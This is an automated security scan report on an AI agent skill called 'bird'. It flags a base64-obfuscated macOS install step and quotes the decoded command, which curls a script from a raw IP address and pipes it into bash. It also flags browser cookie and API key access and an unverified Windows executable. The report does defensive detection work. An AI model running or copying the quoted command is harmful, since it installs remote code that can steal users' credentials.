Trust Assessment
bird received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 4 findings: 2 critical, 1 high, 1 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Obfuscated Remote Code Execution via Suspicious IP, Skill designed to access sensitive browser data and API keys.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/bird-ar/SKILL.md:10 | |
| CRITICAL | Obfuscated Remote Code Execution via Suspicious IP The MacOS installation instructions include a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and executes an arbitrary script from a non-standard, potentially malicious IP address (`91.92.242.30`) directly into the user's shell. This is a severe supply chain risk, command injection vulnerability, and uses obfuscation to hide its true intent. The downloaded script could perform any action, including installing malware, exfiltrating sensitive data (like browser cookies or API keys mentioned later in the skill description), or establishing persistence. Remove the obfuscated command. Provide a clear, verifiable, and secure installation method, preferably through official package managers or signed binaries from trusted sources. If a script is necessary, it should be hosted on a trusted domain, its contents should be auditable, and its execution should be explicitly confirmed by the user. | LLM | SKILL.md:14 | |
| HIGH | Skill designed to access sensitive browser data and API keys The skill description explicitly states that it uses "Browser cookies (default: Firefox/Chrome)" and requires `SWEETISTICS_API_KEY`. Given the critical remote code execution vulnerability identified in the MacOS installation, any malicious script executed could easily target and exfiltrate these sensitive browser cookies and API keys, leading to account compromise or unauthorized access. While the skill itself *needs* these for functionality, the insecure installation method makes them highly vulnerable targets. Address the critical remote code execution vulnerability first. Ensure the `bird` tool itself is open-source and auditable, or provided by a highly trusted vendor, to verify that it handles sensitive data securely and does not exfiltrate it. Implement robust security practices for handling credentials and sensitive data. | LLM | SKILL.md:29 | |
| MEDIUM | Download and execution of untrusted external binary The Windows installation instructions direct users to download a `.zip` file containing an executable (`OpenClawProvider-1.0.2.zip`) from a GitHub release page and run it. While GitHub releases can be legitimate, relying on an executable from an arbitrary repository without further verification (e.g., code signing, checksums, open-source auditability) introduces a supply chain risk. A compromised GitHub account or malicious executable could lead to system compromise. Provide checksums for downloaded binaries. Ideally, the `OpenClawProvider` should be open-source and buildable from source, or distributed via a trusted package manager with code signing. Users should be warned about running untrusted executables. | LLM | SKILL.md:10 |
Scan History
Embed Code
[](https://skillshield.io/report/c45f2e8bb04e3d72)
Powered by SkillShield